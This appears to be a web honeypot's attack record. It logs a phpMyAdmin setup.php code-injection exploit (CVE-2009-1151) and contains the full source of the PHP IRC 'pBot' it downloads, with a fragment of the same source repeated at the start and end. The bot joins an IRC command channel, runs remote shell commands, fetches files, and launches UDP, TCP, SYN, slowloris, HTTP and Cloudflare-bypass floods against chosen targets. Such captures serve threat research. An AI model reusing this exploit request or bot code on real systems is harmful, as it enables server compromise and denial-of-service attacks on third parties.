$this->privmsg($this->config['chan'], "[\2IRC TERRORIST - TCP - STO LANCIANDO BOMBE ATOMICHE SUL BERSAGLIO!!!\2]");
$timei = time();
$packet = "";
for ($i = 0; $i < 65000; $i++) {
$packet .= $this->charset[rand(0, strlen($this->charset))];
}
while (time() - $timei < $time) {
$handle = fsockopen("tcp://".$host, $port, $errno, $errstr, 1);
fwrite($handle, $packet);
}
$this->privmsg($this->config['chan'], "[\2IRC TERRORIST - TCP - BOMBE LANCIATE SUL BERSAGLIO, NON CREDO SIANO ANCORA VIVI!!!\2]");
}
public function slowRead($host, $port, $time) {
$timei = time();
$fs = array();
//initialize get headers.
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - SLOWREAD - STO LANCIANDO BOMBE ATOMICHE SUL BERSAGLIO!!!\2]");
$headers = "GET / HTTP/1.1\r\nHost: {$host}\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36\r\n\r\n";
while (time() - $timei < $time) {
for ($i = 0; $i < 100; $i++) {
$fs[$i] = @fsockopen($host, $port, $errno, $errstr);
fwrite($fs[$i], $headers);
}
while (time() - $timei < $time) {
for ($i = 0; $i < count($fs); $i++) {
if (!$fs[$i]) {
$fs[$i] = @fsockopen($host, $port, $errno, $errstr);
fwrite($fs[$i], $headers);
}
fread($fs[$i], 1);
}
sleep(mt_rand(0.5, 2));
}
}
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - SLOWREAD - BOMBE LANCIATE SUL BERSAGLIO, NON CREDO SIANO ANCORA VIVI!!!\2]");
}
public function attack_http($mthd, $server, $time) {
$timei = time();
$fs = array();
$this->privmsg($this->config['chan'], "[\2Layer 7 {$mthd} Attack Started On : $server!\2]");
$request = "$mthd / HTTP/1.1\r\n";
$request .= "Host: $server\r\n";
$request .= "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n";
$request .= "Keep-Alive: 900\r\n";
$request .= "Accept: *.*\r\n";
$timei = time();
for ($i = 0; $i < 100; $i++) {
$fs[$i] = @fsockopen($server, 80, $errno, $errstr);
}
while ((time() - $timei < $time)) {
for ($i = 0; $i < 100; $i++) {
if (@fwrite($fs[$i], $request)) {
continue;
} else {
$fs[$i] = @fsockopen($server, 80, $errno, $errstr);
}
}
}
$this->privmsg($this->config['chan'], "[\2Layer 7 {$mthd} Attack Finished!\2]");
}
public function attack_post($server, $host, $time) {
$timei = time();
$fs = array();
$this->privmsg($this->config['chan'], "[\2Layer 7 Post Attack Started On : $server!\2]");
$request = "POST /" . md5(rand()) . " HTTP/1.1\r\n";
$request .= "Host: $host\r\n";
$request .= "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n";
$request .= "Keep-Alive: 900\r\n";
$request .= "Content-Length: 1000000000\r\n";
$request .= "Content-Type: application/x-www-form-urlencoded\r\n";
$request .= "Accept: *.*\r\n";
for ($i = 0; $i < 100; $i++) {
$fs[$i] = @fsockopen($host, 80, $errno, $errstr);
}
while ((time() - $timei < $time)) {
for ($i = 0; $i < 100; $i++) {
if (@fwrite($fs[$i], $request)) {
continue;
} else {
$fs[$i] = @fsockopen($host, 80, $errno, $errstr);
}
}
}
fclose($sockfd);
$this->privmsg($this->config['chan'], "[\2Layer 7 Post Attack Finished!\2]");
}
public function doSlow($host, $time) {
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - SLOWLORIS - STO LANCIANDO BOMBE ATOMICHE SUL BERSAGLIO!!!\2]");
$timei = time();
$i = 0;
for ($i = 0; $i < 100; $i++) {
$fs[$i] = @fsockopen($host, 80, $errno, $errstr);
}
while ((time() - $timei < $time)) {
for ($i = 0; $i < 100; $i++) {
$out = "POST / HTTP/1.1\r\n";
$out .= "Host: {$host}\r\n";
$out .= "User-Agent: Opera/9.21 (Windows NT 5.1; U; en)\r\n";
$out .= "Content-Length: " . rand(1, 1000) . "\r\n";
$out .= "X-a: " . rand(1, 10000) . "\r\n";
if (@fwrite($fs[$i], $out)) {
continue;
} else {
$fs[$i] = @fsockopen($server, 80, $errno, $errstr);
}
}
}
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - SLOWLORIS - BOMBE LANCIATE SUL BERSAGLIO, NON CREDO SIANO ANCORA VIVI!!!\2]");
}
public function syn($host, $port, $time, $delay=1) {
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - SYN - STO LANCIANDO BOMBE ATOMICHE SUL BERSAGLIO!!!\2]");
$timei = time();
$socks = array();
while (time() - $timei < $time) {
$numsocks++;
$socks[$numsocks] = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if (!$socks[$numsocks]) continue;
@socket_set_nonblock($socks[$numsocks]);
for ($j = 0; $j < 20; $j++)
@socket_connect($socks[$numsocks], $host, $port);
sleep($delay);
}
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - SYN - BOMBE LANCIATE SUL BERSAGLIO, NON CREDO SIANO ANCORA VIVI!!! (".$numsocks." socks created)!\2]");
}
public function synflood($host, $port, $delay) {
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - Syn - STO LANCIANDO BOMBE ATOMICHE SUL BERSAGLIO!!!\2]");
$socks = array();
$numsocks = 0;
$numsocks++;
$socks[$numsocks] = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if(!$socks[$numsocks])
continue;
@socket_set_nonblock($socks[$numsocks]);
for($j = 0; $j < 20; $j++)
@socket_connect($socks[$numsocks], $host, $port);
sleep($delay);
for ($j = 0; $j < $numsocks; $j++) {
if($socks[$j])
@socket_close($socks[$j]);
}
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - Syn - BOMBE LANCIATE SUL BERSAGLIO, NON CREDO SIANO ANCORA VIVI!!!\2]: Config - For $host:$port.");
}
public function udpflood($host, $port, $time, $packetsize) {
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - UDP - STO LANCIANDO BOMBE ATOMICHE SUL BERSAGLIO!!!\2]");
$packet = "";
for ($i = 0; $i < $packetsize; $i++) {
$packet .= chr(rand(1, 256));
}
$end = time() + $time;
$i = 0;
$fp = fsockopen("udp://" . $host, $port, $e, $s, 5);
while (true) {
fwrite($fp, $packet);
fflush($fp);
if ($i % 100 == 0) {
if($end < time())
break;
}
$i++;
}
fclose($fp);
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - UDP - BOMBE LANCIATE SUL BERSAGLIO, NON CREDO SIANO ANCORA VIVI!!!\2]: " . $env . " MB sent / Average: " . $vel . " MB/s ");
}
public function tcpconn($host, $port, $time) {
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - TCP - STO LANCIANDO BOMBE ATOMICHE SUL BERSAGLIO!!!\2]");
$end = time() + $time;
$i = 0;
while ($end > time()) {
$fp = fsockopen($host, $port, $dummy, $dummy, 1);
fclose($fp);
$i++;
}
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - TCP - BOMBE LANCIATE SUL BERSAGLIO, NON CREDO SIANO ANCORA VIVI!!!\2]: sent " . $i . " connections to $host:$port.");
}
}
$bot = new pBot;
$bot->start($cfg);
function curl($url, $post=array(), $user_agent="", $deleteCookies=false) {
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_URL, $url);
if ($user_agent) {
curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
}
if (!empty($post)) {
curl_setopt($ch,CURLOPT_POST, 1);
curl_setopt($ch,CURLOPT_POSTFIELDS, $post);
}
if ($deleteCookies) {
file_put_contents("cookie.txt", "");
}
curl_setopt ($ch, CURLOPT_COOKIEJAR, "cookie.txt");
curl_setopt ($ch, CURLOPT_COOKIEFILE, "cookie.txt");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$result = curl_exec($ch);
//$statusCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
return $result;
}
function get_between($string,$start,$end) {
$string = " ".$string;
$ini = strpos($string, $start);
if($ini==0) return "";
$ini += strlen($start);
$len = strpos($string, $end, $ini) - $ini;
return substr($string, $ini, $len);
}
?>
phpMyAdmin (/scripts/setup.php) PHP Code Injection Exploit
[Attack info]
Attacker:
95.216.174.175
Dest. port: 80
Time: 17/02/2019 01:50:20
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS24940 Hetzner Online GmbH
Location: Newland, Helsinki (zipcode 00100)
rDNS: static.175.174.216.95.clients.your-server.de
Description
phpMyAdmin is prone to a remote PHP code-injection vulnerability on the page "setup.php". An attacker can exploit this issue to inject and execute arbitrary malicious PHP code in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible. Versions prior to phpMyAdmin 2.11.9.5 and 3.1.3.1 are vulnerable.CVE
CVE-2009-1151Author
Adrian "pagvac" PastorPlugin ID
oosheefee1baixeinief5nociu5shohhPOST /phpMyAdmin/scripts/setup.php HTTP/1.1
Content-Length: 241
cookie2: $Version="1"
Host: 21.171.51.29
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]
connection: TE
referer: http://21.171.51.29/phpMyAdmin/scripts/setup.php
cookie: phpMyAdmin=d007a44761984bd2008c50bad4ee5c17
te: deflate,gzip;q=0.3
Content-Type: application/x-www-form-urlencoded
action=lay_navigation&eoltype=unix&token=d7961c1f90c9e481f0aa6d63b1d8009d&configuration=a%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA%5FConfig%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A32%3A%22ftp%3A%2F%2F51%2E38%2E119%2E192%2Fpub%2Fpbot%2Ephp%22%3B%7D%7D
Resource ( 1 / 1 )
MD5: 2be6db19e83a9cd7b4923319ce60c662
Type: text/x-php
Size: 39364
URL: ftp://51.38.119.192/pub/pbot.php
<?php
$cfg = array(
"server" => "51.38.119.192",
"port" => "6667",
"key" => "",
"prefix" => "Zombie",
"maxrand" => "8",
"chan" => "#exploitation",
"trigger" => ".",
"hostauth" => "ddos"
);
set_time_limit(0);
error_reporting(0);
$dir = getcwd();
$uname = @php_uname();
function whereistmP() {
$uploadtmp = ini_get('upload_tmp_dir');
$uf = getenv('USERPROFILE');
$af = getenv('ALLUSERSPROFILE');
$se = ini_get('session.save_path');
$envtmp = (getenv('TMP')) ? getenv('TMP') : getenv('TEMP');
if(is_dir('/tmp') && is_writable('/tmp'))
return '/tmp';
if(is_dir('/usr/tmp') && is_writable('/usr/tmp'))
return '/usr/tmp';
if(is_dir('/var/tmp') && is_writable('/var/tmp'))
return '/var/tmp';
if(is_dir($uf) && is_writable($uf))
return $uf;
if(is_dir($af) && is_writable($af))
return $af;
if(is_dir($se) && is_writable($se))
return $se;
if(is_dir($uploadtmp) && is_writable($uploadtmp))
return $uploadtmp;
if(is_dir($envtmp) && is_writable($envtmp))
return $envtmp;
return '.';
}
function srvshelL($command) {
$name = whereistmP() . "\\" . uniqid('NJ');
$n = uniqid('NJ');
$cmd = (empty($_SERVER['ComSpec'])) ? 'd:\\windows\\system32\\cmd.exe' : $_SERVER['ComSpec'];
win32_create_service(array(
'service' => $n,
'display' => $n,
'path' => $cmd,
'params' => "/c $command >\"$name\""
));
win32_start_service($n);
win32_stop_service($n);
win32_delete_service($n);
while(!file_exists($name))
sleep(1);
$exec = file_get_contents($name);
unlink($name);
return $exec;
}
function ffishelL($command) {
$name = whereistmP() . "\\" . uniqid('NJ');
$api = new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
$res = $api->WinExec("cmd.exe /c $command >\"$name\"", 0);
while(!file_exists($name))
sleep(1);
$exec = file_get_contents($name);
unlink($name);
return $exec;
}
function comshelL($command, $ws) {
$exec = $ws->exec("cmd.exe /c $command");
$so = $exec->StdOut();
return $so->ReadAll();
}
function perlshelL($command) {
$perl = new perl();
ob_start();
$perl->eval("system(\"$command\")");
$exec = ob_get_contents();
ob_end_clean();
return $exec;
}
function Exe($command) {
$exec = $output = '';
$dep[] = array(
'pipe',
'r'
);
$dep[] = array(
'pipe',
'w'
);
if (function_exists('passthru')) {
ob_start();
@passthru($command);
$exec = ob_get_contents();
ob_clean();
ob_end_clean();
} elseif (function_exists('system')) {
$tmp = ob_get_contents();
ob_clean();
@system($command);
$output = ob_get_contents();
ob_clean();
$exec = $tmp;
} elseif (function_exists('exec')) {
@exec($command, $output);
$output = join("\n", $output);
$exec = $output;
} elseif(function_exists('shell_exec'))
$exec = @shell_exec($command);
elseif (function_exists('popen')) {
$output = @popen($command, 'r');
while (!feof($output)) {
$exec = fgets($output);
}
pclose($output);
} elseif (function_exists('proc_open')) {
$res = @proc_open($command, $dep, $pipes);
while (!feof($pipes[1])) {
$line = fgets($pipes[1]);
$output .= $line;
}
$exec = $output;
proc_close($res);
} elseif(function_exists('win_shell_execute') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')
$exec = winshelL($command);
elseif(function_exists('win32_create_service') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')
$exec = srvshelL($command);
elseif(extension_loaded('ffi') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')
$exec = ffishelL($command);
elseif(extension_loaded('perl'))
$exec = perlshelL($command);
return $exec;
}
class pBot {
public $config = '';
public $user_agents = array(
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.60 Safari/537.17",
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
"Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2",
"Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20120403211507 Firefox/12.0",
"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)",
"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)",
"Opera/9.80 (Windows NT 6.1; U; es-ES) Presto/2.9.181 Version/12.00"
);
public $charset = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
public $users = array();
public function start($cfg) {
$this->config = $cfg;
while (true) {
if(!($this->conn = fsockopen($this->config['server'], $this->config['port'], $e, $s, 30)))
$this->start($cfg);
$ident = $this->config['prefix'];
$alph = range("0", "9");
for($i = 0; $i < $this->config['maxrand']; $i++)
$ident .= $alph[rand(0, 9)];
$this->send("USER " . $ident . " 127.0.0.1 localhost :" . php_uname() . "");
$this->set_nick();
$this->main();
}
}
public function main() {
while (!feof($this->conn)) {
if (function_exists('stream_select')) {
$read = array(
$this->conn
);
$write = NULL;
$except = NULL;
$changed = stream_select($read, $write, $except, 30);
if ($changed == 0) {
fwrite($this->conn, "PING :lelcomeatme\r\n");
$read = array(
$this->conn
);
$write = NULL;
$except = NULL;
$changed = stream_select($read, $write, $except, 30);
if($changed == 0)
break;
}
}
$this->buf = trim(fgets($this->conn, 512));
$cmd = explode(" ", $this->buf);
if (substr($this->buf, 0, 6) == "PING :") {
$this->send("PONG :" . substr($this->buf, 6));
continue;
}
if (isset($cmd[1]) && $cmd[1] == "001") {
$this->join($this->config['chan'], $this->config['key']);
continue;
}
if (isset($cmd[1]) && $cmd[1] == "433") {
$this->set_nick();
continue;
}
if ($this->buf != $old_buf) {
$mcmd = array();
$msg = substr(strstr($this->buf, " :"), 2);
$msgcmd = explode(" ", $msg);
$nick = explode("!", $cmd[0]);
$vhost = explode("@", $nick[1]);
$vhost = $vhost[1];
$nick = substr($nick[0], 1);
$host = $cmd[0];
if($msgcmd[0] == $this->nick)
for($i = 0; $i < count($msgcmd); $i++)
$mcmd[$i] = $msgcmd[$i + 1];
else
for($i = 0; $i < count($msgcmd); $i++)
$mcmd[$i] = $msgcmd[$i];
if (count($cmd) > 2) {
switch ($cmd[1]) {
case "PRIVMSG":
if ($vhost == $this->config['hostauth'] || $this->config['hostauth'] == "*") {
if (substr($mcmd[0], 0, 1) == ".") {
switch (substr($mcmd[0], 1)) {
case "mail":
if (count($mcmd) > 4) {
$header = "From: <" . $mcmd[2] . ">";
if (!mail($mcmd[1], $mcmd[3], strstr($msg, $mcmd[4]), $header)) {
$this->privmsg($this->config['chan'], "[\2mail\2]: failed sending.");
} else {
$this->privmsg($this->config['chan'], "[\2mail\2]: sent.");
}
}
break;
case "dns":
if (isset($mcmd[1])) {
$ip = explode(".", $mcmd[1]);
if (count($ip) == 4 && is_numeric($ip[0]) && is_numeric($ip[1]) && is_numeric($ip[2]) && is_numeric($ip[3])) {
$this->privmsg($this->config['chan'], "[\2dns\2]: " . $mcmd[1] . " => " . gethostbyaddr($mcmd[1]));
} else {
$this->privmsg($this->config['chan'], "[\2dns\2]: " . $mcmd[1] . " => " . gethostbyname($mcmd[1]));
}
}
break;
case "uname":
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") {
$safemode = "on";
} else {
$safemode = "off";
}
$uname = php_uname();
$this->privmsg($this->config['chan'], "[\2info\2]: " . $uname . " (safe: " . $safemode . ")");
break;
case "rndnick":
$this->set_nick();
break;
case "raw":
$this->send(strstr($msg, $mcmd[1]));
break;
case "eval":
ob_start();
eval(strstr($msg, $mcmd[1]));
$exec = ob_get_contents();
ob_end_clean();
$ret = explode("\n", $exec);
for($i = 0; $i < count($ret); $i++)
if($ret[$i] != NULL)
$this->privmsg($this->config['chan'], " : " . trim($ret[$i]));
break;
case "exec":
$command = substr(strstr($msg, $mcmd[0]), strlen($mcmd[0]) + 1);
$exec = exec($command);
$ret = explode("\n", $exec);
for($i = 0; $i < count($ret); $i++)
if($ret[$i] != NULL)
$this->privmsg($this->config['chan'], " : " . trim($ret[$i]));
break;
case "cmd":
$command = substr(strstr($msg, $mcmd[0]), strlen($mcmd[0]) + 1);
$exec = Exe($command);
$ret = explode("\n", $exec);
for($i = 0; $i < count($ret); $i++)
if($ret[$i] != NULL)
$this->privmsg($this->config['chan'], " : " . trim($ret[$i]));
break;
case "ud.server":
if (count($mcmd) > 2) {
$this->config['server'] = $mcmd[1];
$this->config['port'] = $mcmd[2];
if (isset($mcmcd[3])) {
$this->config['pass'] = $mcmd[3];
$this->privmsg($this->config['chan'], "[\2update\2]: info updated " . $mcmd[1] . ":" . $mcmd[2] . " pass: " . $mcmd[3]);
} else {
$this->privmsg($this->config['chan'], "[\2update\2]: switched server to " . $mcmd[1] . ":" . $mcmd[2]);
}
fclose($this->conn);
}
break;
case "download":
if (count($mcmd) > 2) {
if (!$fp = fopen($mcmd[2], "w")) {
$this->privmsg($this->config['chan'], "[\2download\2]: could not open output file.");
} else {
if (!$get = file($mcmd[1])) {
$this->privmsg($this->config['chan'], "[\2download\2]: could not download \2" . $mcmd[1] . "\2");
} else {
for ($i = 0; $i <= count($get); $i++) {
fwrite($fp, $get[$i]);
}
$this->privmsg($this->config['chan'], "[\2download\2]: file \2" . $mcmd[1] . "\2 downloaded to \2" . $mcmd[2] . "\2");
}
fclose($fp);
}
} else {
$this->privmsg($this->config['chan'], "[\2download\2]: use .download http://your.host/file /tmp/file");
}
break;
case "udpflood":
if (count($mcmd) > 4) {
$this->udpflood($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4]);
}
break;
case "tcpconn":
if (count($mcmd) > 5) {
$this->tcpconn($mcmd[1], $mcmd[2], $mcmd[3]);
}
break;
case "rudy":
if (count($mcmd) > 2) {
$this->doSlow($mcmd[1], $mcmd[2]);
}
break;
case "slowread":
if (count($mcmd) > 3) {
$this->slowRead($mcmd[1], $mcmd[2], $mcmd[3]);
}
break;
case "slowloris":
if (count($mcmd) > 2) {
$this->doSlow($mcmd[1], $mcmd[2]);
}
break;
case "synflood":
if (count($mcmd) > 3) {
$this->synflood($mcmd[1], $mcmd[2], $mcmd[3]);
}
case "l7":
if (count($mcmd) > 3) {
if ($mcmd[1] == "get") {
$this->attack_http("GET", $mcmd[2], $mcmd[3]);
}
if ($mcmd[1] == "post") {
$this->attack_post($mcmd[2], $mcmd[3]);
}
if ($mcmd[1] == "head") {
$this->attack_http("HEAD", $mcmd[2], $mcmd[3]);
}
}
break;
case "syn":
if (count($mcmd) > 2) {
$this->syn($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4]);
} else {
$this->privmsg($this->config['chan'], "syntax: syn host port time [delaySeconds]");
}
break;
case "tcpflood":
if (count($mcmd) > 2) {
$this->tcpflood($mcmd[1], $mcmd[2], $mcmd[3]);
} else {
$this->privmsg($this->config['chan'], "syntax: tcpflood host port time");
}
break;
case "httpflood":
if (count($mcmd) > 2) {
$this->httpflood($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4], $mcmd[5]);
} else {
$this->privmsg($this->config['chan'], "syntax: httpflood host port time [method] [url]");
}
break;
case "proxyhttpflood":
if (count($mcmd) > 2) {
$this->proxyhttpflood($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4]);
} else {
$this->privmsg($this->config['chan'], "syntax: proxyhttpflood targetUrl(with http://) proxyListUrl time [method]");
}
break;
case "cloudflareflood":
print_r($mcmd);
if (count($mcmd) > 2) {
$this->cloudflareflood($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4], $mcmd[5], $mcmd[6]);
} else {
$this->privmsg($this->config['chan'], "syntax: cloudflareflood host port time [method] [url] [postFields]");
}
break;
}
}
}
break;
}
}
}
}
}
public function send($msg) {
fwrite($this->conn, $msg . "\r\n");
}
public function join($chan, $key = NULL) {
$this->send("JOIN " . $chan . " " . $key);
}
public function privmsg($to, $msg) {
$this->send("PRIVMSG " . $to . " :" . $msg);
}
public function notice($to, $msg) {
$this->send("NOTICE " . $to . " :" . $msg);
}
public function set_nick() {
$fp = fsockopen("freegeoip.net", 80, $dummy, $dummy, 30);
if(!$fp)
$this->nick = "";
else {
fclose($fp);
$ctx = stream_context_create(array(
'http' => array(
'timeout' => 30
)
));
$buf = file_get_contents("http://freegeoip.net/json/", 0, $ctx);
if(!strstr($buf, "country_code"))
$this->nick = "";
else {
$code = strstr($buf, "country_code");
$code = substr($code, 12);
$code = substr($code, 3, 2);
$this->nick = "[" . $code . "]";
}
}
if(strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')
$this->nick .= "[WIN32]";
else
$this->nick .= "[LINUX]";
if (isset($_SERVER['SERVER_SOFTWARE'])) {
if(strstr(strtolower($_SERVER['SERVER_SOFTWARE']), "apache"))
$this->nick .= "[A]";
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']), "iis"))
$this->nick .= "[I]";
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']), "xitami"))
$this->nick .= "[X]";
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']), "nginx"))
$this->nick .= "[N]";
else
$this->nick .= "[U]";
} else {
$this->nick .= "[C]";
}
$this->nick .= $this->config['prefix'];
for($i = 0; $i < $this->config['maxrand']; $i++)
$this->nick .= mt_rand(0, 9);
$this->send("NICK " . $this->nick);
}
public function cloudflareflood($host, $port, $time, $method="GET", $url="/", $post=array()) {
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - CloudFlare - STO LANCIANDO BOMBE ATOMICHE SUL BERSAGLIO!!!\2]");
$timei = time();
$user_agent = $this->user_agents[rand(0, count($this->user_agents)-1)];
$packet = "$method $url HTTP/1.1\r\n";
$packet .= "Host: $host\r\n";
$packet .= "Keep-Alive: 300\r\n";
$packet .= "Connection: keep-alive\r\n";
$packet .= "User-Agent: $user_agent\r\n";
//Cloudflare Bypass
$res = curl($host, null, $user_agent, true);
//Cloudflare Bypass
if (strstr($res, "DDoS protection by CloudFlare")) {
$this->privmsg($this->config['chan'], "[\2CloudFlare detected!...\2]");
//Get the math calc
$math_calc = get_between($res, "a.value = ", ";");
if ($math_calc) {
$math_result = (int) eval("return ($math_calc);");
if (is_numeric($math_result)) {
$math_result += strlen($host); //Domain lenght
//Send the CloudFlare's form
$getData = "cdn-cgi/l/chk_jschl";
$getData .= "?jschl_vc=".get_between($res, 'name="jschl_vc" value="', '"');
$getData .= "&jschl_answer=".$math_result;
$res = curl($host.$getData, null, $user_agent);
//Cloudflare Bypassed?
if (strstr($res, "DDoS protection by CloudFlare")) {
$this->privmsg($this->config['chan'], "[\2CloudFlare not bypassed...\2]");
return false;
} else {
$bypassed = true;
//Cookie read
$cookie = trim(get_between(file_get_contents("cookie.txt"), "__cfduid", "\n"));
$packet .= "Cookie: __cfduid=".$cookie."\r\n\r\n";
}
}
}
} else {
$this->privmsg($this->config['chan'], "[\2CloudFlare not detected...\2]");
}
if ($bypassed) {
$this->privmsg($this->config['chan'], "[\2CloudFlare bypassed!\2]");
}
$this->privmsg($this->config['chan'], "[\2Flodding...\2]");
while (time() - $timei < $time) {
$handle = fsockopen($host, $port, $errno, $errstr, 1);
fwrite($handle, $packet);
}
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - CloudFlare - BOMBE LANCIATE SUL BERSAGLIO, NON CREDO SIANO ANCORA VIVI!!!\2]");
}
public function httpflood($host, $port, $time, $method="GET", $url="/") {
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - HTTP - STO LANCIANDO BOMBE ATOMICHE SUL BERSAGLIO!!!\2]");
$timei = time();
$user_agent = $this->user_agents[rand(0, count($this->user_agents)-1)];
$packet = "$method $url HTTP/1.1\r\n";
$packet .= "Host: $host\r\n";
$packet .= "Keep-Alive: 900\r\n";
$packet .= "Cache-Control: no-cache\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$packet .= "Accept-Language: en-GB,en-US;q=0.8,en;q=0.6\r\n";
$packet .= "Accept-charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n";
$packet .= "Connection: keep-alive\r\n";
$packet .= "User-Agent: $user_agent\r\n\r\n";
while (time() - $timei < $time) {
$handle = fsockopen($host, $port, $errno, $errstr, 1);
fwrite($handle, $packet);
}
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - HTTP - BOMBE LANCIATE SUL BERSAGLIO, NON CREDO SIANO ANCORA VIVI!!!\2]");
}
public function proxyhttpflood($url, $proxyListUrl, $time, $method="GET") {
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - PROXYHTTP - STO LANCIANDO BOMBE ATOMICHE SUL BERSAGLIO!!!\2]");
$timei = time();
//Grabbing proxy
$proxyList = curl($proxyListUrl);
if ($proxyList) {
$proxies = explode("\n", $proxyList);
if (count($proxies)) {
shuffle($proxies);
$proxies[0] = trim($proxies[0]);
$proxy = explode(":", $proxies[0]);
$proxyIp = $proxy[0];
$proxyPort = $proxy[1];
if ($proxyPort && $proxyIp) {
$user_agent = $this->user_agents[rand(0, count($this->user_agents)-1)];
$packet = "$method $url HTTP/1.1\r\n";
$packet .= "Host: $host\r\n";
$packet .= "Keep-Alive: 900\r\n";
$packet .= "Cache-Control: no-cache\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$packet .= "Accept-Language: en-GB,en-US;q=0.8,en;q=0.6\r\n";
$packet .= "Accept-charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n";
$packet .= "Connection: keep-alive\r\n";
$packet .= "User-Agent: $user_agent\r\n\r\n";
while (time() - $timei < $time) {
$handle = fsockopen($proxyIp, $proxyPort, $errno, $errstr, 1);
fwrite($handle, $packet);
}
} else {
$this->privmsg($this->config['chan'], "[\2Malformed proxy!\2]");
}
} else {
$this->privmsg($this->config['chan'], "[\2No proxies found!\2]");
}
} else {
$this->privmsg($this->config['chan'], "[\2Proxy List not found!\2]");
}
$this->privmsg($this->config['chan'], "[\2IRC TERRORIST - HTTP - BOMBE LANCIATE SUL BERSAGLIO, NON CREDO SIANO ANCORA VIVI!!! (Proxy: ".$proxies[0].")!\2]");
}
public function tcpflood($host, $port, $time) {
$this->privmsg($this->config['chan'], "[\2IRC TERRORIST - TCP - STO LANCIANDO BOMBE ATOMICHE SUL BERSAGLIO!!!\2]");
$timei = time();
$packet = "";
for ($i = 0; $i < 65000; $i++) {
$packet .= $this->charset[rand(0, strlen($this->charset))];
}
while (time() - $timei < $time) {
$handle = fsockopen("tcp://".$host, $port, $errno, $errstr, 1);
fwrite($handle, $packet);
}
$this->privmsg($this->config['chan'], "[\2IRC TERRORIST - TCP - BOMBE LANCIATE SUL BERSAGLIO, NON CREDO SIANO ANCORA VIVI!!!\2]");
}
public function slowRead($host, $port, $time) {
$timei = time();
$fs = array();
//initialize get headers.
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - SLOWREAD - STO LANCIANDO BOMBE ATOMICHE SUL BERSAGLIO!!!\2]");
$headers = "GET / HTTP/1.1\r\nHost: {$host}\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36\r\n\r\n";
while (time() - $timei < $time) {
for ($i = 0; $i < 100; $i++) {
$fs[$i] = @fsockopen($host, $port, $errno, $errstr);
